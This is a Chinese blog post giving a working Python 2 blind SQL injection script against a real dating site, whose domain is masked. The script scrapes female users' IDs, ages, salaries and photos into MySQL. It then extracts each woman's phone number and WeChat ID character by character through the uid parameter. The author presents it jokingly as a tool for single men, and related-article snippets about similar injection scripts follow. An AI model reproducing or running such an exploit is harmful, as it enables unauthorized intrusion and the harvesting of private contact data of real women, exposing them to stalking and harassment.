python mysql盲注脚本

最新推荐文章于 2023-03-28 00:30:00 发布
最新推荐文章于 2023-03-28 00:30:00 发布
阅读量2.5k 收藏 2
点赞数 1
分类专栏: 记录
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/meinaozi/article/details/81229308
版权

某相亲网漏洞,可盲注获得手机号和微信号。
功能1:爬取所有女性ID、年龄、月薪、照片URL
功能2:通过盲注方式获取对应ID的手机号和微信号
功能3:所有数据自动导入MYSQL
缺点:单线程
这个代码写得好心酸。。单身狗必备


# -*- coding: utf-8 -*-
# @Time    : 2018-7-24 13:13
# @Author  : meinaozi
# @File    : hehe.py
# @Software: PyCharm
# @Ver     : Python2.7

import sys, requests, json
import MySQLdb
from math import ceil

if sys.getdefaultencoding() != 'utf-8':
    reload(sys)
    sys.setdefaultencoding('utf-8')


def get_data(url):
    res = requests.get(url, headers=headers)
    return res.text


headers = {
    'UserAgent': 'Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Mobile/15G77 MicroMessenger/6.7.1 NetType/WIFI Language/zh_CN',
    'Referer': 'https://www.*******.com/******/plugin.php?id=*******&mod=*******&pid=1000****&from=singlemessage&isappinstalled=0',
    'Cookie': '***********************************'
}


def get_tel_len(uid):
    for k in range(10, 13):
        URL1 = "https://www.*******.com/******/plugin.php?id=******&mod=visiting_card&pid=1000*****"
        URL2 = URL1 + "&uid=" + uid + " and length(tel)=" + str(k) + "-- a&Submit=Submit"
        if get_data(URL2).find("&uid=" + uid) > 1:
            data_len = k
            break
    print "Telphone length is : %s" % data_len
    return data_len


def get_wx_len(uid):
    for k in range(6, 21):
        URL1 = "https://www.*******.com/******/plugin.php?id=********&mod=visiting_card&pid=1000******"
        URL2 = URL1 + "&uid=" + uid + " and length(wx)=" + str(k) + "-- a&Submit=Submit"
        if get_data(URL2).find("&uid=" + uid) > 1:
            data_len = k
            break
    print "wecat length is : %s" % data_len
    return data_len


def get_tel(uid, data_len):
    URL1 = "https://www.********.com/*****/plugin.php?id=**********&mod=visiting_card&pid=1000*******"
    payload_num = "0123456789"
    tel = ""
    for j in range(1, data_len + 1):
        for l in payload_num:
            URL3 = URL1 + "&uid=" + uid + " and substr(LOWER(tel)," + str(j) + ",1)='" + l + "'-- a&Submit=Submit"
            if get_data(URL3).find("&uid=" + uid) > 1:
                tel = tel + l
                break
    print "Telphone is : %s" % tel
    return tel


def get_wx(uid, data_len):
    URL1 = "https://www.********.com/*****/plugin.php?id=**********&mod=visiting_card&pid=1000*****"
    payload_num = "abcdefjhijklmnopqrstuvwxyz0123456789_-"
    tel = ""
    for j in range(1, data_len + 1):
        for l in payload_num:
            URL3 = URL1 + "&uid=" + uid + " and substr(LOWER(wx)," + str(j) + ",1)='" + l + "'-- a&Submit=Submit"
            if get_data(URL3).find("&uid=" + uid) > 1:
                tel = tel + l
                break
    print "wecat is : %s " % tel
    return tel

def charge(mid, i):  # 判断大小
    global uid
    ur = "https://www.********.com/*****/plugin.php?id=*******&mod=visiting_card&pid=100********"
    url = ur + "&uid=%s and ascii(substr(wx,%s,1))<=%s-- a&Submit=Submit" % (uid,i,mid)
    #
    # print url
    # sys.exit()
    s = requests.get(url=url,headers=headers)
    content = s.content
    # print content
    # sys.exit()
    # print length
    if content.find("&uid=" + uid) > 10:
        return 1
    else:
        return 0

def dichotomie(l, r, i):  # 利用二分法查找
    mid = (l + r) / 2
    # print "l and r ,mid:",l,r,mid
    if l == r:
        global string
        string += chr(r)
        print string
        return 0
    if charge(mid, i):  # <=
        # print 0
        dichotomie(l, mid, i)
    else:
        # print 1
        dichotomie(int(ceil((l + r) * 1.0 / 2)), r, i)

def get_public_data(page):
    URL1 = "https://api.********.cn/*****/plugin.php?id=*****_zhaopin&mod=*******&openid=******************&uid=********&usersex=1&pid=100********&type=ajax&open_province_id=420&action=&search=&sex=12&typeFrom=&age=20&height=30&income=40&xueli=50&province_id=&city_id=&page=%s" % page
    ret = json.loads(get_data(URL1))
    return ret


def insert_user(uid, nickname, age, yx, pic1, pic2, pic3, pic4, pic5, tel, wx, hide):
    global db
    cursor = db.cursor()
    sql = "INSERT INTO user(uid,nickname,age,yx,pic1,pic2,pic3,pic4,pic5,tel,wx,hide) VALUES ('%s','%s','%s','%s','%s','%s','%s','%s','%s','%s','%s','%s')" % (
        uid, nickname, age, yx, pic1, pic2, pic3, pic4, pic5, tel, wx, hide)
    try:
        cursor.execute(sql)
        db.commit()
        return True
    except Exception, e:
        db.rollback()
        print e
        # return False


def select_data(sql, mode="single"):
    global db
    cursor = db.cursor()
    cursor.execute(sql)
    if mode == 'single':
        return cursor.fetchone()
    elif mode == 'update':
        db.commit()
        return True
    else:
        return cursor.fetchall()


def close_db():
    global db
    if db:
        db.close()


if __name__ == '__main__':
    while True:
        action = raw_input("请选择模式:[1]拉取最新信息 [2]输入uid查询手机号码和微信\r\n".decode('utf-8').encode('gbk'))
        if action and action in ("1", "2"):
            break
        else:
            print "输入错误\r\n".decode('utf-8').encode('gbk')

    if action == "1":
        try:
            db = MySQLdb.connect("localhost", "root", "123456", "xq",
                                 charset='utf8')
        except Exception, e:
            print e
        z = 0
        for i in range(1, 13):
            ret = get_public_data(i)
            if ret['code'] == u'200':
                for j in range(len(ret['data'])):
                    uid = ret['data'][j]['id']
                    nickname = ret['data'][j]['nickname']
                    age = ret['data'][j]['age']
                    yx = ret['data'][j]['yx']
                    pic1 = ""
                    if (len(ret['data'][j]['picurl1']) > 1): pic1 = ret['data'][j]['picurl1']
                    pic2 = ""
                    if (len(ret['data'][j]['picurl2']) > 1): pic2 = ret['data'][j]['picurl2']
                    pic3 = ""
                    if (len(ret['data'][j]['picurl3']) > 1): pic3 = ret['data'][j]['picurl3']
                    pic4 = ""
                    if (len(ret['data'][j]['picurl4']) > 1): pic4 = ret['data'][j]['picurl4']
                    pic5 = ""
                    if (len(ret['data'][j]['picurl5']) > 1): pic5 = ret['data'][j]['picurl5']
                    tel = ""
                    wx = ""
                    hide = 0
                    SQLret = select_data("select uid from `user` where uid='%s'" % uid, "single")
                    if not SQLret:
                        if insert_user(uid, nickname, age, yx, pic1, pic2, pic3, pic4, pic5, tel, wx, hide):
                             z = z + 1

        print "insert count: %s line" % z
        close_db()
    elif action == "2" :
        while True:
            uid = raw_input("请输入uid\r\n".decode('utf-8').encode('gbk'))
            if uid and uid.isdigit():
                break
            else:
                print "输入错误\r\n".decode('utf-8').encode('gbk')
        try:
            db = MySQLdb.connect("localhost", "root", "123456", "xq",
                                 charset='utf8')
        except Exception, e:
            print e
        # print get_public_data(11)
        # get_public_data(11)['code'] == 200
        SQLret = select_data("select uid from `user` where uid='%s'" % uid, "single")
        if not SQLret:
            print "can't find this uid in mysql"
            sys.exit()

        tel_len = get_tel_len(uid)
        #tel_len = 11
        tel = get_tel(uid, tel_len)

        SQLret = select_data("update `user` set tel='%s' where uid='%s'" % (tel,uid) ,"update")
        if SQLret:
            print "tel update ok!"

        string = ""
        wx_len = get_wx_len(uid)
        for i in range(1, wx_len + 1):  # range第二个参数是字段长度
            dichotomie(44, 123, i)
        print string
        #wx = get_wx(uid, wx_len)
        SQLret = select_data("update `user` set wx='%s' where uid='%s'" % (string,uid) ,"update")
        if SQLret:
            print "wx update ok!"
        close_db()
夜班机器人
关注
专栏目录
Python-Sql盲注检测
weixin_57041250的博客
11-02 232
sql盲注分为布尔型盲注,时间型盲注
基于DVWA靶场的盲注脚本
altersueyunsheng的博客
05-28 470
基于DVWA的自动盲注脚本 本文针对的是dvwa盲注部分的low级别的自动注入,关于概念等就不做介绍了。相比较有回显的注入,盲注这种注入方式要多次猜解,比如数据库名,需要猜解出其长度,再依据长度多次循环猜解出每个字母,最后得到数据库名。 布尔盲注 dvwa盲注猜解正确会回显"User ID…",以此作为判断是否注入成功,headers为自己构造的头部信息。 def judge_sql_inject(sql, url, headers): # 返回判断,盲注 str = f'?id={sql}&am
爱上python盲注探测脚本
dfdhxb995397的博客
09-13 173
  本文转自:i春秋论坛 前言:   最近在学python,做了个盲注的简单的跑用户的脚本,仅做个记录。   sqmap也有不灵的时候,有时需要根据情况自写脚本探测   正文:   本地用大表姐给的sql和php文件搭建了个布尔盲注的靶机   另外感谢大表姐的指导。   稍作解释:注入语句里用%s占位,等待在for循里面依次判断长度 [App...
SQL盲注脚本MySQL
卧龙居
11-13 1312
#coding:utf-8 import urllib.request import json """ SQL盲注脚本,适用于MYSQL数据库;CTF 0~1 SQL注入第二题 """ class SqlBlindInjection(object): def __init__(self): self.url = "http://eci-2zej1goyn9jgugq1cnzn.cloudeci1.ichunqiu.com/login.php" #条件为真的返回值.
sql盲注之报错注入(附自动化脚本)
dfdhxb995397的博客
12-29 861
作者:__LSA__ 0x00 概述 渗透的时候总会首先测试注入,sql注入可以说是web漏洞界的Boss了,稳居owasp第一位,普通的直接回显数据的注入现在几乎绝迹了,绝大多数都是盲注了,此文是盲注系列的第一篇,介绍盲注中的报错注入。 0×01 报错注入原理 其实报错注入有很多种,本文主要介绍几种常见的报错方法,有新姿势后续再更新。 1. Dupli...
从零开始学安全(三十五)●mysql 盲注手工自定义python脚本
weixin_30532369的博客
03-25 96
import requests import string #mysql 手动注入 通用脚本 适用盲注 可以跟具自己的需求更改 def home(): url="url" list=string.digits+string.letters+"!@#$%^&*()_+{}-=<>,./?" s=requests.session...
sqli-labs-php7第5关使用python进行盲注笔记
weixin_44644249的博客
10-23 207
sqli-labs-php7第5关使用python进行盲注笔记 sqli-labs-php7第5关使用python进行盲注笔记 记录sqli-labs个人学习笔记,代码有些不完善。比如有下划线的数据库名解析不够完整,只做了数据库名的解析,表名和字段没写,但大概是那意思,只需要在information_schema里选择相应的内容就可以了。 python代码 import requests ''' 注入参数:limit变量(limit_int)用于返回所有的数据库名 ascii对照变量(as
mysql时间盲注if的绕过_MySQL时间盲注五种延时方法 (PWNHUB 非预期解)
weixin_42382703的博客
01-19 941
PWNHUB 一道盲注题过滤了常规的sleep和benchmark函数,引发对时间盲注中延时方法的思考。延时函数SLEEPmysql> select sleep(5);+----------+| sleep(5) |+----------+| 0 |+----------+1 row in set (5.00 sec)BENCHMARKmysql> select benc...
SQL住入原始脚本_SQL注入python脚本_
10-03
标题中的“SQL住入原始脚本”指的是利用SQL注入技术来编写或执行的原始SQL命令,而“SQL注入python脚本”则表明我们将探讨如何使用Python编写脚本来自动化这一过程。 SQL注入攻击主要有三种类型:直列注入、延时...
python 漏洞扫描_Python脚本实现Web漏洞扫描工具
weixin_39793576的博客
12-15 2565
这是去年毕设做的一个Web漏洞扫描小工具,主要针对简单的SQL注入漏洞、SQL盲注和XSS漏洞,代码是看过github外国大神(听说是SMAP的编写者之一)的两个小工具源码,根据里面的思路自己写的。以下是使用说明和源代码。一、使用说明:1.运行环境:Linux命令行界面+Python2.72.程序源码:Vim scanner//建立一个名为scanner的文件Chmod a+xscanner//修...
sql盲注python
yy2013
10-07 482
写一款工具,可以用来进行sql盲注 前提: 数据库是mysql工具中使用的sql语句: 判断表是否存在: (select count(*) from tablename)>0 判断列是否存在:(select count(*) from tablename where 列名=)>0 猜字段中记录长度 ;and (select top 1 len(字段名) from 数据
python布尔盲注脚本
最新发布
kiihuang的博客
03-28 517
使用python,编写一个可以自动爆破的布尔盲注脚本,根据不同情况调整里面的Content-Length的值。
python脚本自动化盲注_Python SQL盲注脚本
weixin_42181686的博客
02-11 381
Python SQL盲注脚本2018-11-30268基于布尔盲注#!/usr/bin/env pythonimport requests#dbs#SELECT GROUP_CONCAT(SCHEMA_NAME) FROM information_schema.SCHEMATA#tables#SELECT GROUP_CONCAT(table_NAME) FROM information_sche...
帮我写一个时间盲注python脚本
weixin_35757531的博客
01-03 208
时间盲注攻击是一种数据库攻击方法,其目的是通过构造特殊的SQL查询语句来猜测数据库中的数据。在进行时间盲注攻击时,攻击者会在SQL查询中包含一个或多个条件,并通过测量查询的执行时间来判断条件是否成立。 下面是一个使用Python实现时间盲注攻击的示例代码: importtime import requests # 目标数据库地址 url = "http://database.com/query"...
构造exp-Python盲注脚本
告白的博客
08-12 475
0x00 搭建环境介绍 平常的盲注如果手工会很麻烦,多数情况都会借助sqlmap等相关软件跑,但是有些情况下,考虑到sqlmap的线程以及其他情况,会造成其他的影响,这里我们来简单使用python构造一个盲注脚本,低线程,高效率。 利用到metinfo老版本平台,平台中集合多种漏洞,本次实验实验python构造盲注exp,实现注入 手工注入测试: 0x01 利用python构造exp-盲注脚本 import requests def get_html(url): "我的功能判断页面内容是否
mysql盲注二分法脚本
zh_cn1的博客
08-12 435
PS 闲得蛋疼,写了个盲注脚本,最后发现还是sqlmap香 import requests #布尔盲注mysql脚本 #正常页面的大小 def resLen(url): res=requests.get(url) return len(res.text) #当前数据库长度 def currdb_len(url): payload="1' and length(database())=" for i in range(1,100): if resLen(url+payload+str(i
python脚本之布尔盲注
ro4lsc的博客
04-21 7151
这个好像也没什么可以多说了,那么直接上脚本吧 import optparse import requests #---------------------------- usage = "python3 %prog -u <URL> -P <patten> -F <find text>" parser = optparse.OptionParser(usage...
基于python的布尔盲注爆破脚本(sqli-libs第八关)
henghengzhao_的博客
10-06 1897
写这个脚本的原因是因为布尔爆破步骤的繁琐,因此写下这个半自动化脚本来提升效率,只需输入url和标志词便可开始爆破
Python 安全开发 布尔盲注脚本
YouthBelief的博客
12-03 1259
python开发-批量fofa+poc验证0x00 思路0x01 脚本编写1.fofa爬取步骤一:请求搜索地址 以 GlassFish 任意文件读取 为例 0x00 思路 要想批量验证漏洞是否存在需要考虑的点: 1.获取可能存在漏洞的地址信息。 1.1可借助fofa获取目标 影响版本是 <= 4.1.1 fofa指纹 "GlassFish" && port="4848" && country="CN" 或者 "GlassFish" && port
Python实现MySQL巡检脚本
下面提供的一款MySQL巡检脚本是基于Python编写的,结合了`psutil`、`mysql.connector`、`argparse`、`json`和`datetime`等库,用于获取CPU、内存和磁盘使用情况以及MySQL连接状态等关键信息。" 在脚本中,可以看到...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值